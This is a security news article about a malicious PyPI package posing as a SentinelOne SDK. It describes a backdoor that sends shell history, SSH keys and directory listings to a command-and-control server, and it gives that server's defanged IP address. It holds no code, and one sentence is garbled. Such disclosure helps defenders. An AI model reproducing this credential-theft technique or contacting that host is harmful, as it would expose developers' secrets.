Malicious PyPI package posed as SentinelOne SDK to serve info-stealing malware

Malicious PyPI package posed as SentinelOne SDK to serve info-stealing malware

Cybersecurity researchers at ReversingLabs have discovered a new malicious package, named ‘SentinelOne,’ on the Python Package Index (PyPI) repository that impersonates a legitimate software development kit (SDK) for SentinelOne.

The package, SentinelOne has no connection to the noted threat detection firm of the same name and was first uploaded to PyPI, the Python Package Index, on Dec 11, 2022.

The package appears to be a fully functional SentinelOne client, but contains a malicious backdoor, according to ReversingLabs threat researcher Karlo Zanki. The malicious functionality in the library does not execute upon installation, but waits to be called on programmatically before activating – a possible effort to avoid detection. We are calling this campaign “SentinelSneak.”

The backdoor was designed to exfiltrate data specific to development environments, such as shell command execution history and the contents of the SSH folder, which stores SSH keys and configuration information, including login credentials for Git, Kubernetes, and AWS services.

The malware also lists folders in the root directory and sends all collected data to the command-and-control (C&C) server.

The fake ‘SentinelOne’ package contains “ files that contains the code to steal and exfiltrate data uploading it to the IP address 54[.]254[.]189[.]27).

Threat actors published five additional malicious packages with a similar name, these modules did not contain files with malicious functionality, a circumstance that suggests they were used for testing purposes.

The ReversingLabs research team is continuously monitoring open-source package repositories for instances of malicious code 

Follow Us on: Twitter, InstagramFacebook to get the latest security news!

About the Author:

FirstHackersNews- Identifies Security

Leave A Comment

Subscribe to our newsletter to receive security tips everday!